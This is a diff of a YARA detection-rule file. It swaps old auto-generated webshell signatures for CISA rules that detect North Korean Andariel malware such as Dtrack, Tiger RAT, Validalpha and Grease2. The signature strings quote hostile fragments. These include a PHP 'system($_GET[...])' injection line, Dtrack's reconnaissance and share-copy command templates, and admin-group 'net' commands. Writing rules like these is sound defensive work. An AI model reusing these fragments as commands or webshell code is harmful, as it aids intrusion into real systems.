+		$unique_2 = "ERROR: Downloading is already running!" ascii
+		$unique_3 = "ERROR: Unable to open file:" ascii
+		$unique_4 = "General error" ascii
+		$unique_5 = "CMD error" ascii
+		$unique_6 = "killing self" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $lilith_* ) or 4 of ( $unique_* ) or 1 of ( $lilith_4 , $unique_2 ) )
 }
-rule SIGNATURE_BASE_Fmlibraryv3
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Sockstroy_Strings_Opcodes : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file fmlibraryv3.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9b8ef79d-80bb-5a05-91e6-0f2bc3fd3068"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8578-L8589"
+		description = "Detects a variant of the SocksTroy malware family"
+		author = "CISA.gov"
+		id = "9e7fb6ba-771e-5cae-a0d5-c0b95ee6d4e9"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L180-L199"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c34c248fed6d5a20d8203924a2088acc"
-		logic_hash = "a7dc83db26cdda757f626c42022c17bb2764074a3cc5f87b4a3aaa991fac5dc2"
-		score = 75
+		logic_hash = "6ab31b285d0dba1745a2d8b172bd02931c6138e2b8e541203b88f111d179549b"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
+		$strHost = "-host" wide
+		$strAuth = "-auth" wide
+		$SocksTroy = "SocksTroy"
+		$cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $str* ) and all of ( $c* ) or all of ( $Socks* ) )
 }
-rule SIGNATURE_BASE_Debug_Dlltest_2
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Agni : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cf81e3de-513c-584d-bc37-6504e91b170c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8590-L8602"
+		description = "Detects samples of the Agni malware family"
+		author = "CISA.gov"
+		id = "ffe3f427-c10a-5ad4-ab29-c0d9b576c30f"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L201-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1b9e518aaa62b15079ff6edb412b21e9"
-		logic_hash = "bf260ce0f8d4728920679573cd77927b44db28ba6102923707af8d1ad7d0ef2d"
-		score = 50
+		logic_hash = "302899b65e5a3a6beabbb46e80e3f0ff246c209206cc3a7f871011d68871d0b9"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s4 = "\\Debug\\dllTest.pdb"
-		$s5 = "--list the services in the computer"
+		$xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }
+		$stackstrings = { C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and #xor > 100 and #stackstrings > 5
 }
-rule SIGNATURE_BASE_Connector
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Handshake
 {
 	meta:
-		description = "Webshells Auto-generated - file connector.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e46026bc-c570-5057-a132-5a459c959a69"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8603-L8615"
+		description = "Detects a variant of the GoLang Validalpha malware"
+		author = "CISA.gov"
+		id = "51dafa43-9da0-569a-9123-7e9800284046"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L218-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3ba1827fca7be37c8296cd60be9dc884"
-		logic_hash = "b8cadb7aa23a8cdef10e7b1eb05586d6c3e7c398958a80861b6f1ccd4edf1eca"
+		logic_hash = "1978210d07d3298c0051c9faca16685636e3fb45131b4c2fcb7053a0b3ef84d1"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
-		$s4 = "Add UNIQUE ID for victims / zombies"
+		$ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Hiderun
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Tasks
 {
 	meta:
-		description = "Webshells Auto-generated - file HideRun.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd71dbef-5b5d-5976-8b95-0f202a4b4795"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8616-L8628"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "45436d9bfd8ff94b71eeaeb280025afe"
-		logic_hash = "3a6dea2314800b28e92b59595c8b79c64e66dc66ebfa8f89c2f4028b574b9a91"
-		score = 75
+		description = "Detects a variant of the GoLang Validalpha malware"
+		author = "CISA.gov"
+		id = "caa67a79-3ea6-5910-971c-f311722570ff"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L232-L247"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "0d3fb944888b289d345ffc8dfcc988abd04b8cabd1729a66e8236f95ee6147ee"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Usage -- hiderun [AppName]"
-		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
+		$ = "main.ScreenMonitThread"
+		$ = "main.CmdShell"
+		$ = "main.GetAllFoldersAndFiles"
+		$ = "main.SelfDelete"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_PHP_Shell_V1_7
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Blackstring : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7eb69ac3-90bb-5a44-8dcd-e71f5edcf18f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8629-L8640"
+		description = "Detects a variant of the GoLang Validalpha malware based on a file path found in the samples"
+		author = "CISA.gov"
+		id = "36f46a1d-69b6-5c99-9a54-6a14d62d2721"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L249-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5978501c7112584532b4ca6fb77cba5"
-		logic_hash = "e03904177309de9ce1afa0b12bf70913b106650c3db5807f9d4ccb91fb2ade77"
-		score = 75
+		logic_hash = "07ea38890e99dd53437a23b7c4002851604b69a83bd7fb8971609226249e5954"
+		score = 90
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
+		$ = "I:/01___Tools/02__RAT/Black"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Xssshell_Save
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_ELF_Backdoor_Fipps : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file save.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f33c7559-e2f7-5223-a0e9-4e1d3bc7f080"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8641-L8653"
+		description = "Detects a Linux backdoor named Fipps used by Andariel"
+		author = "CISA.gov"
+		id = "040bca78-8b7e-5397-8a2b-1ddeed59eea3"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L291-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "865da1b3974e940936fe38e8e1964980"
-		logic_hash = "c53034c6ebc4f01c4573e688f548e71dae944913797b12eb8f22a5ef0a368ccf"
-		score = 75
+		logic_hash = "3b57eb6c6b89e93863b9600c4a1384f3e064f236e827ef9ffc37b1e5dcff7d24"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
-		$s5 = "VictimID = fm_NStr(Victims(i))"
+		$a = "found mac address"
+		$b = "RecvThread"
+		$c = "OpenSSL-1.0.0-fipps"
+		$d = "Disconnected!"
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_Screencap
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Bindshell : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file screencap.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0c1b71d3-ad54-5230-b1ab-971647e76139"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8654-L8667"
+		description = "Detects a BindShell used by Andariel"
+		author = "CISA.gov"
+		id = "3f6d83da-cea5-5e12-b0ba-93ace09d3d5c"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L309-L328"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "51139091dea7a9418a50f2712ea72aa6"
-		logic_hash = "9be7ec97ef8e9b8838f7931a8fcf8d85b1543a202a7bf34fab9791fc47889cb9"
-		score = 75
+		logic_hash = "409aa6a27d81e14ea90d90ee02924cb11f5fecef592e6577b084f9ab2dde35fc"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "GetDIBColorTable"
-		$s1 = "Screen.bmp"
-		$s2 = "CreateDCA"
+		$str_comspec = "COMSPEC"
+		$str_consolewindow = "GetConsoleWindow"
+		$str_ShowWindow = "ShowWindow"
+		$str_WSASocketA = "WSASocketA"
+		$str_CreateProcessA = "CreateProcessA"
+		$str_port = { B9 4D 05 00 00 89 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_FSO_S_Phpinj_2
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Grease2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phpinj.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "db8f835e-eb13-50f3-a60b-7d8ffcaa5eaa"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8668-L8679"
+		description = "Detects the Grease2 malware family used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "4defbe08-b3c6-5ab9-9a57-cec57ff42d9a"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L330-L351"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dd39d17e9baca0363cc1c3664e608929"
-		logic_hash = "12af5182b94f01ac4fbdee92c007556aaa7f196aca116575803cedd84b81f3b0"
-		score = 75
+		logic_hash = "138fc915206e0c2834090ebc0a808913488121d51c17de3dbfadcb4099fbfa2f"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
+		$str_rdpconf = "emp\\RDPConf.exe"
+		$str_rdpwinst = "emp\\RDPWInst.exe"
+		$str_net_user = "net user"
+		$str_admins_add = "net localgroup administrators"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxrecv
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Nopineapple_Dtrack_Unpacked : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file zxrecv.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9d36541f-dd55-5385-8e2b-598ad78bdf73"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8680-L8697"
+		description = "Detects the Dtrack variant used by Andariel"
+		author = "CISA.gov"
+		id = "6ccaf24b-c110-5788-a792-fa7f39fb18f7"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L353-L368"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
-		logic_hash = "7eef63e45f6902e4f2d5f854b2794df3101a2ef145e2d627263db429c2b728d7"
-		score = 75
+		logic_hash = "cf5f92a66ba3ff4db61102dcc50b781e8dd14ca7cb1eb70dae8eba2ed0910b66"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "RyFlushBuff"
-		$s1 = "teToWideChar^FiYP"
-		$s2 = "mdesc+8F D"
-		$s3 = "\\von76std"
-		$s4 = "5pur+virtul"
-		$s5 = "- Kablto io"
-		$s6 = "ac#f{lowi8a"
+		$str_nopineapple = "< No Pineapple! >"
+		$str_qt_library = "Qt 5.12.10"
+		$str_xor = { 8B 10 83 F6 ?? 83 FA 01 77 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_FSO_S_Ajan
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Dtrack_Unpacked : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ajan.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "03bf98b9-c8c5-5b9f-b0cd-700c5ed58eac"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8698-L8709"
+		description = "Detects DTrack variant used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "0c161275-2b2e-51a4-9e08-c118fb4c8671"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L370-L393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "22194f8c44524f80254e1b5aec67b03e"
-		logic_hash = "a7766caae5845ce43cff2212c25fea9a78979d10c79d8c40290b5c1471b101cd"
+		logic_hash = "d8de583fc0de01e6784305d28dbf7cea859a24cf4df1dc59356601bc830e4770"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s4 = "entrika.write \"BinaryStream.SaveToFile"
+		$x_str_cmd_4 = "/c systeminfo > \"%s\" & tasklist > \"%s\" & netstat -naop tcp > \"%s\"" wide
+		$x_str_cmd_2 = "/c ping -n 3 127.0.01 > NUL % echo EEE > \"%s\"" wide
+		$str_mutex = "MTX_Global"
+		$str_cmd_1 = "/c net use \\\\" wide
+		$str_cmd_3 = "/c move /y %s \\\\" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_C99Shell
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Tigerrat_Crowdsourced_Rule : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file c99shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8710-L8721"
+		description = "Detects the Tiger RAT variant used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "6be65222-7d3c-5ff5-a9c7-d91dcf1deaa6"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L395-L424"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
-		logic_hash = "a0fcc43a80ac4d059aea36da8b4b5a81c99a54f7c66c521697805ae890d66fe8"
+		logic_hash = "5d203d8c7e624796571f4597f70be0b8303f21c096640f25018cad29d4abc05b"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
+		$m1 = ".?AVModuleKeyLogger@@" fullword ascii
+		$m2 = ".?AVModulePortForwarder@@" fullword ascii
+		$m3 = ".?AVModuleScreenCapture@@" fullword ascii
+		$m4 = ".?AVModuleShell@@" fullword ascii
+		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
+		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
+		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
+		$s4 = "del \"%s\"%s \"%s\" goto " ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_Phpspy_2005_Full
+rule SIGNATURE_BASE_MAL_APT_NK_WIN_Tiger_RAT_Auto : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phpspy_2005_full.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8722-L8733"
+		description = "Detects the Tiger RAT variant used by Andariel"
+		author = "CISA.gov"
+		id = "4579af62-52be-5f5f-a577-16ec50297c05"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L426-L565"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d1c69bb152645438440e6c903bac16b2"
-		logic_hash = "8561161726a49374a9bc3389fef593e5d68dc437552e06736a235412183bef45"
+		logic_hash = "1deef66efb44c0d17f33508a8b6f0d6253f0308f309e81657f78eb0f87121bf5"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
+		$sequence_0 = { 33 c0 89 44 24 38 89 44 24 30 44 8b cf 45 33 c0 }
+		$sequence_1 = { 41 b9 01 00 00 00 48 8b d6 48 8b cb e8 ?? ?? ?? ?? }
+		$sequence_2 = { 48 81 ec 90 05 00 00 8b 01 89 85 c8 04 00 00 8b 41 04 }
+		$sequence_3 = { 48 8b 01 ff 10 48 8b 4f 08 4c 8d 4c 24 30 }
+		$sequence_4 = { 48 8b 01 ff 10 48 8b 4e 18 48 8b 01 }
+		$sequence_5 = { 48 81 ec a0 00 00 00 33 c0 48 8b d9 48 8d 4c 24 32 }
+		$sequence_6 = { 48 8b 01 eb 03 48 8b c1 0f b6 00 }
+		$sequence_7 = { 48 8b 01 8b 10 89 51 24 44 8b 41 24 45 85 c0 }
+		$sequence_8 = { 4c 8d 0d 31 eb 00 00 c1 e9 18 c1 e8 08 41 bf 00 00 00 80 }
+		$sequence_9 = { 48 8b d8 48 85 c0 75 2d ff 15 ?? ?? ?? ?? 83 f8 57 0f 85 e0 01 00 00 48 8d 0d a0 bd 00 00 }
+		$sequence_10 = { 75 d4 48 8d 1d 7f 6c 01 00 48 8b 4b f8 48 85 c9 74 0b }
+		$sequence_11 = { 0f 85 d9 00 00 00 48 8d 15 d0 c9 00 00 41 b8 10 20 01 00 48 8b cd e8 ?? ?? ?? ?? eb 6b b9 f4 ff ff ff }
+		$sequence_12 = { 48 89 0d ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8d 05 ae 61 00 00 48 89 05 ?? ?? ?? ?? 48 8d 05 a0 55 00 00 48 89 05 ?? ?? ?? ?? }
+		$sequence_13 = { 8b cf e8 ?? ?? ?? ?? 48 8b 7c 24 48 85 c0 0f 84 40 03 00 00 48 8d 05 60 25 01 00 }
+		$sequence_14 = { ff 15 ?? ?? ?? ?? 8b 05 ?? ?? ?? ?? 23 05 ?? ?? ?? ?? ba 02 00 00 00 33 c9 89 05 ?? ?? ?? ?? 8b 05 ?? ?? ?? ?? }
+		$sequence_15 = { 48 83 ec 30 49 8b d8 e8 ?? ?? ?? ?? 48 8b c8 48 85 c0 }
 
 	condition:
-		all of them
+		filesize < 600KB and 7 of them
 }
-rule SIGNATURE_BASE_FSO_S_Zehir4_2
+rule SIGNATURE_BASE_MAL_APT_NK_WIN_Dtrack_Auto : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file zehir4.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7de89d22-0230-508a-ac50-f61730ad9f4e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8734-L8745"
+		description = "Detects DTrack variant used by Andariel"
+		author = "CISA.gov"
+		id = "1b40c685-beba-50fa-b484-c1526577cb23"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L567-L706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b496a61363d304532bcf52ee21f5d55"
-		logic_hash = "bb10f2e28bb375366b9140c06bb242cd13fdb69e67ce72ecae0e50270566f116"
+		logic_hash = "2bd68ee6e5f35a9b80c07120beba3fe1f3ba9a9137ee15bb04bb2740381a9a44"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s4 = "\"Program Files\\Serv-u\\Serv"
+		$sequence_0 = { 52 8b 45 08 50 e8 ?? ?? ?? ?? 83 c4 14 8b 4d 10 51 }
+		$sequence_1 = { 3a 41 01 75 23 83 85 4c f6 ff ff 02 83 85 50 f6 ff ff 02 80 bd 4a f6 ff ff 00 75 ae c7 85 44 f6 ff ff 00 00 00 00 }
+		$sequence_2 = { 50 ff 15 ?? ?? ?? ?? a3 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 04 50 }
+		$sequence_3 = { 8d 8d d4 fa ff ff 51 e8 ?? ?? ?? ?? 83 c4 08 8b 15 ?? ?? ?? ?? }
+		$sequence_4 = { 88 55 f5 6a 5c 8b 45 0c 50 e8 ?? ?? ?? ?? }
+		$sequence_5 = { 51 e8 ?? ?? ?? ?? 83 c4 10 8b 55 8c 52 }
+		$sequence_6 = { 8b 4d 0c 51 68 ?? ?? ?? ?? 8d 95 60 ea ff ff 52 e8 ?? ?? ?? ?? }
+		$sequence_7 = { 83 c0 01 89 45 f4 83 7d f4 20 7d 2c 8b 4d f8 }
+		$sequence_8 = { 83 c0 01 89 85 6c f6 ff ff 8b 8d 70 f6 ff ff 8a 11 }
+		$sequence_9 = { 03 55 f0 0f b6 02 0f b6 4d f7 33 c1 0f b6 55 fc 33 c2 }
+		$sequence_10 = { d1 e9 89 4d f8 8b 55 18 89 55 fc c7 45 f0 00 00 00 00 }
